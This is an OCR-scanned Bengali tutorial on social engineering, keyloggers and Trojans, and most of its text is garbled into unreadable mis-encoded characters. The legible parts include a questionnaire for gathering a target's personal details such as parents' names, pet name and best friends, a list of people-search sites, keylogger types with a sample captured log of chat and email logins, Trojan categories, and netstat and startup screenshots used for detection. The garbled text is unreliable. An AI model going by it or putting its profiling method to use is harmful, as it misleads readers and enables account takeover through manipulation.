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*mHf «IU 4 ^nt%° Titles ft os?c 4 4 <j c*ft 4 ft os?c 4 wt ^tr^h i wr*Rm tw?r 

•iHi^ s^ht^ ftos?c4 <tsft 4<ic<m %»n^? "f^^r ^m^TT^rr^ ctr^i ^r^^rr 
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: ^r c*n?r ^at <it # teft wit ^ i t^.<w 

^nw-e c*trrm w^r 4<r?. ^ni ^jifas. Rto ww\ wl?r w ^rtw 4 <r i 
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svife ^ ■ b : Social Engineering & Manipulation 

oimPr RfR jr^St rr rtrw trr \3i^r rrcr t£ rt^ jrr rtrrvs rcr i jyrr s jiwtcr rIw S-rrrtr rt r%trtr ! 

^R(RR RRflCRt vslI'Hl'CH'fl vR(R(R>fl tv3 ^(RR6Y(Rfl (VR<J4 ^VI4'|5'*5 / t- CRtR ^RTTRR^ ^RR> RRRR W TO"I RRRR 5JTRT RTt RT SlRR <t><f*\\>\ | vslR 

rrr* r*rr RR(Rt(\s> i 'RTR rrr* s rtcr rt i jr siRT ^rirr (Rfw ^rrrr rt rrstrtr jr rrrrr wri Social Engineering jr^ Human 
Manipulations s rrtr^iRT jcrrir RRRRfR arRftR tstEt r^jr i rrr^t jyrr rrst ^rrafR (rrr security t rtr rrttas rtrtrr rt rtr w\ 
rt rtrtr s (\3T ^ttrr *pR r^tt ! r^r Ptcr oRt social engineering 3 human n^anipulation^^ awjr ^trt 

Social Engineering : 


* RWjr 

'■m I 


JI?T Re®* JRR JR*t?T oT- (rvspI^I^ RRRftR* Wf% RTR RRRR JRR3iR RT JRRfRR* RT^jTRR RTIR R*RT RRIv3 RRIvd RT oTRT (RRR RRCRR (RTRTCRTR JR RRTTR 
vsithfl RTvETffRR \3 oJR(.b\3R RIRR RRR (v5Tv§> \3 (RTRR vsRY CRR RRR CRRT I 

(RRR oTTf^T RRvs oTTRTvd RfRSR J oJTRRRR* (RRR RRf%^R\9 vsRT fRRt RT ! ^ITRtR RuvsbR R*RIR \3 RT I fRRF oTTf^T oTTRTR RR(RR R^fbCR* RR J RIR fRR 
(R fs (RiR^ Rvcvsbr rt r*rtr\3 i social engineering v3t vsRi sjtrt crr rrrr t jrr^t R¥f% i 

Human Manipulation : 

(R RR^tW (## R^hf% C\3 JR 7 RT JRRlW RT^JRR oTTFRRR^ JR° WrfRR RTTRRTR 3 ^RRf% (¥ fRR^HW R*RT RR v!>T(R* RRvs Human 
Manipulation rtr I 

(RRR oTffR" RRvs RRTvd FTf*R RT (R ^JlfR (RRR JRTRR (a R[f% fRRF ^JTRIr (RtRRRvs ^RKR (RR RRR fRlvD RTRTRR (R ^TflR (RRRTR RTf% I J&ft Human 
Manipulation. 

^ social engineering 3 human manipulation r^rtas s ottrrtr hirt^r rrs^jjrt orf%R vsrti j^irt ^nfR ^ ^ttrrir IrR i 

(rtrrtrt rt^ (rrr security questionnaires j j^trtr (o^r (RTR^ hr r^rt s rkr^ ! ^r crr (Rt sk?to% vsrt yrr f% f% 


% 

\ i Fullname/%«I%R: 

: ^ i NickName/^T^rpr: 

I 

i«i Father’sname/ft^mpr: 

t 

8 1 Mother’snanie/TO^rpr: 

4 1 DateofBirth/siw#^ 
xb i Placeoffiirth/w?H: 

I 

8 1 Primarye-maiPaisrfsRst- 

j v iSeconclarve-niails/srat- (s^ 

I 

15 > 1 1 Pad dress: 

| 

| bo i Country/^ 

| bbiDivision/ft»pr: 

S bb i District/ew: 

i 

| b« i PhoneNumber: 

1 b 8 1 Cell/MobilePhoneNumber: 

I 

I sciiBestFriends: 

I „ , 

I SvbiPet name : 

I 

: 

| J&t (RR RT I ^TfR\3 ^RRR vsRT t RRRRR RT(R I (R^JXRT \3 HlRT^iR Rvs J fRR? J (RTR RRR fR(v3 RT(RR I 

| JRR RRR%RT^t RfR ^^TKRt RIR RffR Jt RRR%RT^t JR (RRR ^tRT (Rt I W'iKRT S’RRR WVKflT RWfe (\s R^RT RTR RR^f &[l vslR ^IfKRb (R(& \3 
otirtr Rnfe'Rvs oj'fevspvsi (RTR^ oTtfR rr (RiR^ RRR%St Q: St r^1%r r^rt rrr jrkr ^\str T?pt RiR (Rt social engineering v3 human 

| manipulation r^rtr ^rt ottotr rtrras s ^ t reflex action 3 r^ttr fari - r^rt rrtr r^t I vsmRt ^rraRTR rr^t ^rtr r^trrt s 


1 

i: 

: 

: 

:: 

: 

: 

:: 

: 

:: 

: 

:: 

; 

: 

:: 

: 

: 

: 

:: 

: 

: 

: 

:: 

: 

:: 

: 

: 

:: 

: 

:: 

: 

:: 

: 

: 

: 

: 


; 



; 
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| i / /W ^3T (RR RRT / (RRTR RIR RTRFTR (R RRT$ $ JTO fR oTTRIr \3 Rlfllbvs \3 ^|V3|R<I> R(fKR*T \3 

| i RrafR rtr jt a^fe yn ftrtff ftr tfrrr w - rrr^r c^r Pr rtcr i 

I RT3T RM oTfR olM RIR afvDRFFR R^lfl RflR^ RTRIR vdTCR R(RfRR RTRRTR R^JR vs>^ RRR [ 

| R(R Fife R«1 ! ] JFF R(R afvDR^F RT 5 RTR RRR^fftRR , WR ^|bfl \3 RRTR WT Rl°^l RCR RRCR 

| _ ~ 

jr° vs*r rtr oft rrr*^ r?“ 


RIrIrRd (F RRT RRFF v3 FTtMT RM 
w Sr homework ^ ^ i ^ ^ rrr 
vOJ<l*H? 3fvDR(.R>fl RRR ■ ^fW'i (R fRTRR ST 
I JR RfCRt RRpT RORR &T RTORR ^R RTORR 


I $/ Sfw^T viV^iS)/.^ 6 /?" iRTfRR ST RR , ^rf%RTR ^TRRT ^RjfR RTTR5TR ^ ftsffR RR alvD^R R(?lR(\s>fl I f&W RR (R^R oTRpT RTRTR RTR RR 

1 RR RTRR I RTRT — RT , FT^ (RR RRTl $ (RR RT (RR RRR ^JTRRTOR RTRFF RRR ^ 

I 

1 

I 15/W (3yR (Plfw J7W J7R^T (F7R ' ^R ^sjfl 'RTRfR' (RRRR J JRST (RCRR RTCR RvgR RvgR R^W RTf%(RlRR JR° ^JTRRTORR ^U®ifl FN \3 ^TRR 
p JRR RR ST RvF JRfRR (RTRIG CRT R^RR RFR ^RFF I ^JTRRTOR RR RT^ ! fR$F (RR FTOR Raf% ^iRR RTRFTR R RSRT I ^JTRRTR RRT RR 
| ^T^R (RR JRST RRT RTT ” ^R .RF5f (FT vs)|«i$ TOT RRR R^jTRR RTOR .RRKR RTR\3 RT (— l\sR RpT tfiiPi vb'iiPi RR ^ tfilPl 


I JR RR ^RTRRTR RR fRR RRT RTRTR RT ''-ic^RT RRR RT RRR RR \ 3 ^ C*KR? RRR i 

1 5 / a/R/^/S W R^R /RR RRR JR RRR RTTRRR RRRR RT ! RRR v 3 affl'Rfe ^JR RTTRRR f^R R^R I JRRRt HRl^R ^TR RTRRR reflex 

| action jr i r^t rtrt IrrS rt#r RrafR Rfa jrrr w (vf vftr rkr crtr Mtotr rttrtr RrfR^ftr rrr rr rr 1 r\ $ rtrrtr 

I afe^C «1 FFT RTCR ^ 

I 

(tl fiiflRfJ *1&fib ^ 7 RR^R R^R / (RTR fR^FF^ FIFT^FT RRTRR RT ! JFF RRT^ fes tRaffe ^TR ! (FST R^RfRCR FR a^ 1 % RRRRR RRFF ! JR“ 
| aTRFT RRT RT vdRT ^fRTR (RR RRTR (FtT R?JR ! 


r j yrT f%R PlK^ RFJR (RTR vsRT RX2IR RRTR fRR a^hfe I JRRR3 RRT aarf% CF \3 RTafR RTRR RRR RCRR \31RRR]¥S (R(R \3 RaTsTTpfvF RTRR 

vFar caiR ftff arRR i jrrr ^aRrfR rtrrSt v3cr^ri5S jr rtR fRTF m 

i 

I 

| http://www.411.com/ 

I 

http://www.ask.com/ 

I 

p 

http://www.bebo.com/ 

i 

% 

http://www.facebook.com/ 

I 

1 

http://www.flickr.com/ 

l 

1 

http ://www.ip-adress.com/ipaddresstolocation/ 

I 

http://www.myspace.com/ 

I 

P 

http://www.myyearbook.com/ 

http ://www.searchenginez.com/findpeople.html 

I 

http://www.skipease.com/ 

I 

I 

http://www.sonico.com/ 

I 

1 

http://www.spock.com/ 

I 

http://www.twitter.com/ 

I 

http://www.usatrace.com/ 


?)|R»\ f¥p pKilW fl*H “Pfllfl *t,(e “Pfllfl *'!«() «T?T 
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http ://www.whitepages.com 
http ://www.whois.com/ 
http ://www.whois.net/ 
http ://www.wink.com/ 
http ://www.youtube.com 
http ://www.zabasearch.com/ 
http ://www.zooimnfo.com 

srmiw srmsr http://www.google.com: 

* 3irw wFrft «th Social Engineering a Human manipulation i 


Pl^T pKilW S*H “Pfllfl «i«ll *t,(e <Pfl IS «T?T 
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* : #rfsR ? afrr R>oiw wr ^ ? 

Mte ' P raro ojHfii f¥ro fN%° 3 to ^R#t?r ^ro ^(b®ii(b i o^®i TOSt to toto totPito ## ^ ftrPT° (tooito totovs to tottoto (b3®iTO totot ai(®iTO 

vaTTOl CETfCTO (bS°i TOTTO I 3TO]^ TOtt TOTO TO# PiW CTO' -m<M I fTO$F ft## <l>fl|fl TOTC 3 TO# TOTTOTOTO 3 TOTTTOTO cjTTO3TO vTOTO TO 7 ! &[ tf tfifjjfi TO ? 
3^Tv3 TOTfRTO STRICT 3(TO<ITO TO TOT TO TO ! 


TOTOTO TO£ TO TOTO TOPJTO (tfiTO (TOl ffapR fTO ? 3# (f \aiTO TOTTO <Kfl ? 3TO TOa (TO 7 TOTOT TOftS? 


grot GSiCTO Rt ffaffix fTO ? 


Keyloggin to Keystroke Logging wr 3 to#t to#v3totto tototo 3to#t wt3?mTO tos froroR TOfroTO cto£t 3to#t TOf i TO#trro 3<r Hi# It ft cro# 

3TO (#TTO ^Plbfl / TOCTO C?Ito 3 TOCTO \3^ TOpPSblfl 3TO 3TO ojvspKvs I fN%° TOt^TOrTTOTa TOTOTO TO^3TOTTTOTa (TOCTOTCTO #TOCTO TOTO 

TOT I 3TOtT TOTf#a#fl'R' 3 #TTO (TO dlW 3TO TOTTOCTOfl feTO W TOCTO I 

s^vva toctot ss HCo^fi Perry Kivolowitz < ##f#TO3%TO! ftroiTTO ft^n^r tow 1 ^oso tow to# ^pift tot ^jPrff (afNPix to 3 tot 
tojto srto G:s%voo ( approx.) I 

ft *TpR 3TO TOT opfl^ Cfl^t TOT ft e3?TTO ^JTTO TOTOTOTa CA 3 3TOt?T ,TXT W«1 ftCTO' (TO TOT I oTT^gpR 7 ftTOTTTO ^ITO - 3^ TO TO 

3<! TOW ^fTO C^3TO (TOa TOCTO I TO^fTOTO TOf ftTOITTO fei Prefix 3<! TOfT (TO fjlfc TO fTO (TOTOg 3tT aTPTTOTO ftCTO# 3<! TO (T#TO $ 

(TO 7 # TO(<I (SfTSvg TOT# TO# 3tT TOTTOITTO TOTTO3TO# 3TO ^TTOTTO (TOTTOT aTO \3 (TO 7 # ^TOTO Wbl 5 TO oTTTOTO 'TOT oTTOTOT^ ^Tff CTTO IhW 
! TO#TO f#fTOFT TO TOTOTOM ftTOT TOTOR TO TOT^ TO# TO C^fet TO# 3^ Svb f#f#t TOTTO#t TOTO v3 t#f#t 3^ fTO TOTO tT TO3^ TOTO 
TOT I 3TOTO\3 ^TO TOTOTO TOC^f fNTO TOT ^?T I TOCTO TOTf#TO3 ^TTO#TO , TOCTO TOTOSRT# , TOTO 3^Tf% $ #MTO TOT ^?T I (TOTOTO5t ^ooQ: (^TO 7 
fNfTO R 7 TO3CTO3T TOTO 2 ! ft(TO TOT ^T oM#rf#TO TOTOTOs 3 I 3^ TOT $^)o,ooo TO^®T oTTOT ^ TOCTO from TOTOTO3 (Tfv3?TO 

oTI^®T olTO ! 

3TO% fNPr^ TO TOa TO^RW TO^T TOT vsTO TOTO TO CTO 7 fTOTfvs SumitOHlO Mitsui 3<! ^TT tT I 3CTO TOTO ^TfTO (TO 7 ^ooQ: 

TOTO fTO 7 ^TTlTO f#fTOFT ^T C^lt 3^tT Svs R 7 ^ 3^ fpTCTO fTO 8^vs prf%TO fHt*T ^Tf#^ gf% TOTO (5#T TO I 3CTOTO (TO ^VCvsfl 3fgT 
OsTt vgcro toto ^ fNro 3^- fwPro Yeron Bolondi ^jfro 3<r ^tto tot cto to ! 

3^TTO\3 alTOR 7 ~^5 ~^5 RTTv^ 7 CSTOf# Ca \3 fN1%“ <K?1 ^ITOR 7 tTOT ^Tf#C?T TOvS^TO ^(fl ^(fl 3hl^fl«i oTITO ! 

aj|>K«i5 <li(#>3\3 fTOTTOTO TOTO fllpT® ^ ^ ^5 3<^b| ^iff | \3]^ aJlR TOTO T TRT TOTO jTOTOiTOTO (TO ftTOf^T® TOCTO TOfSTO TOT^ I 
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sfy 3^5 T ^&'3?nw I 


fr LOG.TXT - Notepad 


File Edit Format View Help 


chat.yahoo.com [Ent] 
mike93a [Tab] mike [Ent] 
hi david [Ent] 

let'5 skip school tomorrow, he? [Ent] 

Nobody should find out! [Ent] 
what do u mean? [Ent] 
of course! [Ent] 
check out this link: [Ent] 

www.forbiddenstuff.com/threadl2961.html [Ent] 
send it to you by email [Ent] 

[ctl ]n [Alt'] [Tab] [Ent] 
mai1.yahoo.com [Ent] 
mike93a@yahoo.com [Tab] mike [Ent] 
david_ros@gmail.com [Tab] fun stuff [Ent] 
here's the link, make sure nobody sees it [Ent] 
[ctl]v [Ent] [Alt] [Tab] 


sfy s\w&\ *rsr fan# 


M (5^ WF5\ 


w&\3 :i Tn^' Rvsfi 


Hypervisor-based : ^ gf Malware Hypervisor ^ i Svr^fH 

Blue Pill 


tnfr° f*r^jr 
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1 API-based: Application programming interface <it JRtspr API Pr©?r #T 5 im ?pt mt <it fssn^r ^?n ^ (siw sresr i ap 4 iTc<r 4 

2 ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ r JA „ rT ^ A g ^ § 
| 3 W VblfK^>i feTOT' j^R?^T 3 ^ ^Ifllbvs 3?T I f^fP^T 3 W ^TT^^TP^- s \37 573 TOT 5 T]?T I f%$F Sns T^T <Pflp1 [ 40 + WPM ] 337 ^TpR> PJjT^ | 

I _ 4 

tror 3 pr i | 

i \ 

! | 

| Kernel-based: sj?ra?r #rsn?r i em .a?n ^t?r i .a^pt wi&rqfS FUD / Fully Un-Detectable I a^pT mr $ 

| pnnr <p[?«i w>*h a?pf <3> 5 W3> 5 <p[?«h i a^ 5r&'3'?Trr3' s>i$ei?i Roiw f^tPr a^ 5t?r ^"src i 

I I 

I I 

| Form grabbing based: v 3 pr 37S6V13 3 wr 333^7 ^ 3537 ^ Sr HTTPS / HTTP ^pqr^r +tx 3 ?jw onpfe 3 ^ptt 33 3^73 . 

I (wt 3 srapra- ffew 

I I 

I I 

1 1 

I Packet analyzers: HTTP POST wwwi cf tot 3^73 3243733 3373 i 


5T&33TCI3 fe\33 ^)+>1l3 


I Firmware-based : BIOS pjpf 33 Firmware ftr 373 to 333 337 <£i«fe 33 33 $3^ 33 333 
| Keyboard hardware : fefe 3 #l 73 fe 33 cwhi W 37 cvs 3 ^ 373 [ S3733 3 f 33 3 \s ] <£17374 33 (3733737 33 333 33r 1 

I 

I 

| Wireless keyboard sniffers : wireless % 3 fe ( 373 ^ 33 iw 3 +i^tptt 03733731 33 333 337 i 

| 

p Keyboard overlays : 3 fr[ 31233379 (337 373 ATM (3P13 ^ttvs i W 73 37 *p wit 33^ 24^^33 o 7 f 33 ^t fefw w ATM ( 3 pT 3 33 #t- 

0 

I w 3^ 3^ pt^w c 5 ^ PIN ^ 1 

I 

1 

| Acoustic keyloggers : s^vb w CIA 32^7^ #hr^ ^rpr 1 3^ a% S7 #t 3^ &aw 3^7 few Acoustic 

1 Notation ppr 1 ^ pr tott^ orfe \3 tot fepr wr fepR^r ^cfi tot <pfii ^ 1 

1 

| Electromagnetic emissions : ^00^ w ^7 fewr%7 3 *rapr<T #7^ onf^w ^7^7 1 ^o ^ ^ ^ c 2 ^ 3fr ^r ^ ! 


I ffrftriw 3W 3TTPJ- 3^rf^fe 3nw>3 fe^ v wr m few 

I 

| Clipboard logging : Clipboard 3 wiwi fe\ ^7 

I 

I 

p Screen logging : Screenshots 3 w wipt #fe^r ^7 


f+vaic^ ^In^ifi s jc°ii \3ifi <pfii vstDr winSi+r ? 


| S I FTP TO 3 T 7 T 3 W ^TT W 

I 

1 ^l^fe^Tfevs (TOT ^pfer oTI^fe (\3 pfer 

I 

| vs> 1 v3?nM«T57 3 ^ ^ 72 ^ 

P 

P 

I 81 (fl'CHlk ^l'C^]'H 3W W | 


fe\aic<i OTaW ^p77 ^737 ^C\9 ^iicai ? 

^Ylfe° PiC^C^f 5 ~3W\ ^fllfl oTpfW ^fe ^fllfl ^ry °pr 
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SI (^1=T S\^ J^TS' ^fll (^T°T ■^|^ c 1 \3n°T <K£l 

*i P 2 P 

vs I C 3 ! - ^ Rtfi 1^°i ^fll S\<p bl \3l?^ CTO 3 J^f%\3 aiS^lfl PiC^J 3lS>i ®TT ^fll V3 3 I=T 

8 I ^°ii C^T®T 35TlWfl S\^ 

Q: I C^T®T ^flC°ifl 3 T°l 5 rK‘ 5 lW S \^ 

vb I RRj / (vbRRb C 3 !^" 


teE simfir arara ^e^iwh' ffaffa .ra ? 


b I \5TC*TT ^ilFbOl^flR' S \^ ^TT^y^T 


^ I PlCbfl ^R ^bl OT ^55 I J^bl ^blt SIFT S\^ C3T3W 3^ R°b oT[W oHi ST &R£ ^lilWfilfl Sffi I ^5T ($3 (^T=T (3T3W I?T ^Rfb\3 

«H 3i^K C^bl SlffpT 'Sl^C c i'3 <K£M 1% ! ill'll ( c t 3 JI\9 (^(*1$ <341 W«1 ^T 5 Tf% oji^kj | OrSt °TT <Kfl ^TTC 3 ^ aR^lfl 1 J^ <Kfl R®1 


System Configuratio ^ 


General J Boot J Services j Startup [jools 



Date Disabled 


[71 Xvid Unknown C: program Fil... 

[V] Adobe Acrobat Adobe System... ’C:program Fil.. 

[3 GrooveMonit... Microsoft Corp... *C: program Fil.. 

[7] AcroTray * A... Adobe System... *C:program Fil.. 

[7] ClickPotato ... Pinball Corpora... *C: program Fil.. 

[7] Data Manager Bandoo Media,... C:'pR0GRA~2.. 

[71 Adobe Aero... Unknown C: \Windows \In.. 


HKLM\SOFTVMREK-. 


hkcu\software\... 

HKLM\SOFTWARE\... 
HKLM\SOFTWARE\... 
HKLM\SOFTWARE\... 
HKLM SOFTWARE \... 
HKLM SOFTWARE\... 
C: V^rogramData V^ic.. 


Apply 


Help 
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I 


File Options View Help 


Applications 


Processes 


Services Performance Networking Users 


Tmpnp N^mp 


I Ispr Npmp f~:Pl I Mpmr.ru i .. 


| acrotray.exe ... Admin 


00 


200 K 


AcroTray 







chrome.exe *32 

Admin 

00 

72,344 K 

Google C... 

chrome.exe *32 

Admin 

00 

36 r 360 K 

Google C... 

chrome.exe w 32 

Admin 

00 

13,252 K 

Google C... 

chrome.exe 3,1 32 

Admin 

00- 

74,932 K 

Google C... 

ClickPotatoUt... 

Admin 

00 

3,308 K 

ClickPotat,.. 

csrss.exe 


00 

5,112K 


datamngrUI.e... 

Admin 

00 

323 K 

Data Man... 

dwm.exe 

Admin 

oo- 

11,868 K 

Desktop ... 

explorer.exe 

Admin 

00 

7 r 364K 

Windows ... 

ONLINENT.EXE 

Admin 

00 

1,256 K 

Online Pr... 

questscan.exe 


00 

448 K 


SCANMSG.EXE 

Admin 

00- 

1,060 K 

Scan mes... 

taskhost.exe 

Admin 

00 

780 K 

Host Proc... 


processes from all users 


End Process 





Processes: 47 

CPU Usage: 0% 

Physical Memory: 51% 


fo'SlM 4lbt<H PIPF ? 


| S I Oil'll '^UlfboiSfll'l — 14H Pl4g (?T^ 


| } i Anti-spyware - *« s?r ^ w 4 t?r | 

I I 

I I 

I »i Network monitors - w cm OTaw Prcsr <?it 4 a 4 iH 4 i 5 t» *rr?r ««pr (4 Hw«t 4 4 t?r Network monitors I 

1 _ 1 

p 8 1 Automatic form filler programs - nfr ^iW 4 B[ snSwra s?r skBtctU^ spm remember my password j?r p 

I I 

1 1 

I a i One-time passwords (OTP) - 5P&a?msT ^rr tw #1 ^T5tt n?r af# (pr?r W a 6 

1 I 

| vbi On-screen keyboards : $$«>t>si ,a?r 4igsy?i fsiPw i ^ ^ t c?P4 ^nr ow aBm ft c#P4C4^ <rat\s araw | 

1 © | 

i 

1 I 

| s i Keystroke interference software - 3 ? gf encrypt ^ ra" i ^5 ^ <M( 6 Vsi fet^r $ 


| oitt[\ 3\3 >at R*t i 


^|Pk pPJJT pK^(<b ~3W\ ^[v3 <i>«qi«q 3RT 
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«diPi4 snfo ^ «: iSwr f% ? w ? R>®iw ? 


^iPgT OTT («lt ff 


mu mu maim 



(S|vSV|<H amif S?(f(a(vbai <K .°1 


| A Trojan horse, or Trojan, is a standalone malicious program that does not attempHMnfc8ft l tl!BI^B«*pirters in 
| a completely automatic manner without help from outside forces like other programs and human intervention. 

a Psfl PT aa (HTSTTa <q|t(.flfl CmTa amm am Caaa WI C3T3W 3a^ ^l^fl a^Cm am aa°fea sTCa oiay mP*lSblfl ai fap6a 

cm mara cstr mxa ar sicaa cm dm ar c£ma sa" m i 

wi sht os 3mt? araa v3 faaracaray [ trusted ] carsna 3am3a xjfmca armr wfte v3 ^fsmiaa carsna dm I mmg , 

sit aa atstafa , mrfaarff , mpfa^fs , ayrft aatmit aa fam& wrar (mm ara I mar aaca aca arta sraixafi^ fapfia aa registry 

at Wf aa C3T3W $ Wfe ma pfpg^T 3?T mm w sea i 


(§T^T aa mifRR : 


ftm faa sj<^i 51 ftm ar vsicnfi Pm <qi[t51 cm ^icia Pi>facama cssa sia cat mfmjxarcm 3?a ai^lpia vtaara cmi axa ^ m'>3? I 

3 Pm ^pn cam cam caw 3?a aa ^acsay oma aa cssa (am ^anmaa mxa 3?a aaa mca cm i srai®r pjmt *^is aaaxaa carsTpr m dm aw i 
| cm aa i 3m mrnra ar siacaca Mr. James 3 axa aim 3a ya ^fta mrm wm my ! 


j 

: 

: 

: 

: 

: 

: 

:: 

: 

: 

: 


(SWK ,3?r ^fg'4\sl 4T RjW&HIfl a?* W (SlTO 4?(T\3 TO^TT (4K W 0 # ! ! 

malware , spyware OTsrpr ^r 5 ?r 4?rr , 3 3 5 ito5 stow , aiaw ^ $ <rat« to i 


(Swh *fw«f : 


jBt 41% , f®f%& , m? , adware , 


j 


: 

j 


: 

:: 

; 


® Remote Access Trojans: 3^mr fe4f5a 3a fap^a 3a srr^Pm ar aaa faia fam aim i 3a^r msra rnyfamara 3a 
| ararca fea^fEa 3a fafa aa aacaa mjma aar^a ^mra 3a faPr mm i fata^r mara area area 3ia 3a mfcaP fap&a [ symra 3a 
farp^a ] 3a area 3mf?r fapffe caift 3a amca faaraa a^pna "^Taa mca i 3a aa ^aoaa? ta^^a cam ar ^mr mar ara f%mf?a 3a jap^a 3 i m^ta 
sia (^mra 3 aamai 

0 Data Sending Trojans: 3mPr ar aampsia 3a aaca femfGa 3a tap^a ft - aa , ara^a^ , ffm mrcaP fap^a 3 fa^ 

| aca i 

0 Destructive Trojans : ^ Srviy 3 amaa ®rmr araara aar ^ca am i (3m) m^ar^ Sct ■ tap^a mra , srarcafi^ Pcn^a m 

| mar^ mar ar ^ar^ar irm rni^a fef% mar i (^ ) fafaaia Sr^*r\- ■ orraara fafa ona maa 3a cv^a aa mm a^ arar ^ orraaia 

| fapga 3a mrara^aT^ m mrf^oitara i orraaia fafa m fama arara 3a as arfaia tarn maa ar 3 aacaa ®roa am i 3&r 3aa sica orsna 

mar ca 3 srraara tap^a 3 3 pt aaf% ama ^rraara^ arcaa mrara \3ara ar mTf^sitara 3a S'aa 3^prra ta^rtaf? m ^“fam ar ^jmjfa 

1 feamicaa mca i aas ^raara mrca aafm^ orrais \3 fSmirm ama fm^ - (f ^ fSm cal - 

0DDos Attack Trojans: 3m&raisra 3a area a^^ aa fap&a [ ana ca&v3arf ] ar fap^acm afaia prara ^ay 3a cmra ^aar v3 at 

!, Saa \3 at , afsaa a at 1 3ar oraaima ! aaia arsia 3 a a 3a area aqm aa^xar fapSa ma cm orrmaa mca ar tamre^ 

I 

mca mca 3a° 3^car m ^ymait mca area 1 3a aa mxa aa^car fap^a 3 3a° fap^a ^car am aisia 3 3marca ^r^afs tarp^a mar^ tarn 
| aim 1 fap^a 3a mpfmft aasia aitca aaat mam 3a a^mr Ra area saa 3 aisra v3 3aarca a^^ aa^jear fap^a 3marca myra maxa 3a^ 


: 

: 

:: 

: 

:: 

: 

: 

:: 

: 

: 

: 

:: 

: 

: 

: 

:: 


: 

: 

\ 

\ 

: 

:: 

: 

't 

\ 

: 

:: 

: 

:: 

: 

: 

: 
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0 Proxy Trojans : w cr niter ctor rrP -ate teroi tor Rp rtrtr Pter cro ter otitor rrr i r srt ;rtrtr PiPt aR 

I teFR oittoto (TOa scr i ter w 4 tou<6 tors crf TOte Sr cm TOfR i tte <r rt otitouf tesR 3 fw tor i a tor tero 

P 

| r Sr rttrtor tort to*r cte oritctefff , te Pr , totto r a omv^ i ^ a Sr ^ rP a^fc^r cteR ^iiw tort sr i aSr tort ter rto 

I aTOTR (Ro Piter TOmfR TOTR ^RTRIR ^(flb^l PlvD TORR aR° C>KR>(.-9 RTTOpT RTITO 3te> TORTR\3 (TOo Piter aR ^(flb^l TOCR , oTRR Sr to ! 

I 

0 Security Software Disabler Trojan : ateTORt tesR i Piter cro otttor tout acror to to?r Piter aR fteP to aRR tor 

| P^ilfllb RTOfTOTORTR a^ TOTOp\3TO>TR ^JJTO (TO fP^TOTCTOT TOCfl TORRvSt ^RITOTOiRR >3i«ii oTFT*f TOfRCRTO ta(fl TOCfl Cn^RT I a UR (TO Cflft> Q?TO3iTR \3 RTR TOTO 


fTOTTOlR ^TOflRR TOTTOpT TOTaTOY ten [ TORTfte>RR 


(Srir aR torctoto <ivb totoPftorr ^Rs) ^ aSr er ctotr rrtot cat cto?\ 3RR> RTTR^rte aR tour ate PPfP unt? aR tottor Ptctortr (TOP rt 

p 

| TOTTOTR aR Piter a RTPt Pte TOCR I TORTOTOTO RTTfPvRtRTTO oT^RT oJiiPb te \3YTRTR ,orR? TOR \3TORTR a^JCTO TOTOCR ^R TOTO^it oTPTpC WCs 
| TORCRR TOTTOpt (teR RTTOW fTOTO I ^ \3lt TO RT^TpTR^T ffPJo v3 TORUs TOTTORR I \sCR a^RT TOR 3 Rite <jTOCv3 TOTRCRR TOPTpT oTTTOW fTOTO I 
| TRR Rifted TOCR RlPr RRR RTRTRT pRT PlRit (teiTR ft ^Ri (R RTR (te te? 1 ^R RTRTO W t (teR ^CTO FUD / Fully Un- 

I 

I Detectable r i r 2 /^ ^ rrtotoy RirteRtRR \3 aR Rfw torr^ rrs tor to ! Prt Ptotr rr rrcr \tor tofP rtPt 

I RTRTRR R aR RRR ^ 


^) STORt RUN CTO^ RTO^ TOTO& RI CMD v31R R^R PlbR ffeR TOs RTR 


Type the name of a program, folder, document, or Internet 
resource and Windows will open it foryou. 


?T 


O p e 




3 ro w&e.. 


run ^ 1 enidi T^TuR -Xi c i? 1 -1 


rttto' tors v3iR w\ netstat -a Pur ate Pro iau» rtr rtrtr Piter aR rr rr^rt ctoS wrr , ctrtot , rr toot 3 aR 
OTRTO TORpfe ate vd|Pi4 I TOT*f=T RRIR CMD I 


TO%° P^T PlIRilTO R5^T ^R[R RT RITOR RRTR RT R 
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| vs) aw£ laww netstat -a to to am a to aww ^wrawrw ftow aw wpr cart cw awto wwrcw CMD tow tow | 

| WVD wtw 


rai C:\Wind ows\5ystem32\cmd.exe 




si 



Microsoft Windows [Uersion 6.1. 

7601] 




Copyright <c> 2009 Microsoft Co 

rporation. All rights 

reserved. 


1— 1 

C:\Users\Pirate Lord>netstat -a 

C £ XM':' £ 

■f- w 7 ny 



Active 

Connections 

m -H*rr**“***~ WWW -3,export I 


_ 1 

Proto 

T.nr.l 

Foreign Address 

State 



TCP 

0.0.0.0:135 

Black .Pearl :0 

LISTENING 



TCP 

(3.0.H.I3: c l £ i?) 

Black Pearl:0 

LISTENING 



TCP 

0.0.0.0:2869 

Black_Pear1:0 

LISTENING 



TCP 

0.0.0.0:49152 

Black_Pear1:0 

LISTENING 



TCP 

0.0.0.0:49153 

Black_Pear1:0 

LISTENING 



TCP 

0.0.0.0:49154 

Black_Pear1:0 

LISTENING 



TCP 

0.0.0.0:49155 

Black_Pear1:0 

LISTENING 



TCP 

0.0.0.0:49156 

Black_Pear1:0 

LISTENING 



TCP 

127.0.0.1:50693 

Black^Pearl:50694 

ESTABLISHED 



TCP 

127.0.0.1:50694 

Black_Pearl:50693 

ESTABLISHED 



TCP 

127.0.0.1:52465 

Black .Pearl:52466 

ESTABLISHED 



TCP 

127.0.0.1:52466 

Black Pearl:52465 

ESTABLISHED 



TCP 

127.0.0.1:52474 

Black_Pearl:52475 

ESTABLISHED 



TCP 

127.0.0.1:52475 

Black_Pearl:52474 

ESTABLISHED 



TCP 

127.0.0.1:53763 

Black_Pearl:53764 

ESTABLISHED 



TCP 

127.0.0.1:53764 

Black_Pearl:53763 

ESTABLISHED 



TCP 

127.0.0.1:53766 

Black_Pearl:53769 

ESTABLISHED 



TCP 

127.0.0.1:53767 

Black_Pearl:53768 

ESTABLISHED 



TCP 

127.0.0.1:53768 

Black_Pearl:53767 

ESTABLISHED 



TCP 

127.0.0.1:53769 

Black_Pearl:53766 

ESTABLISHED 



TCP 

192.168.52.174:139 

Black_Pear1:0 

LISTENING 



TCP 

192.168.52.174:51139 

sin01s05-in-f21:https 

CLOSE WAIT 



TCP 

192.168.52.174:52103 

magenta:http 

ESTABLISHED 



TCP 

192.168.52.174:52467 

cs216p2:5050 

ESTABLISHED 



TCP 

192.168.52.174:52476 

sipll7:5050 

ESTABLISHED 



TCP 

192.168.52.174:52494 

magenta:http 

ESTABLISHED 



TCP 

192.168.52.174:52522 

magenta:http 

ESTABLISHED 



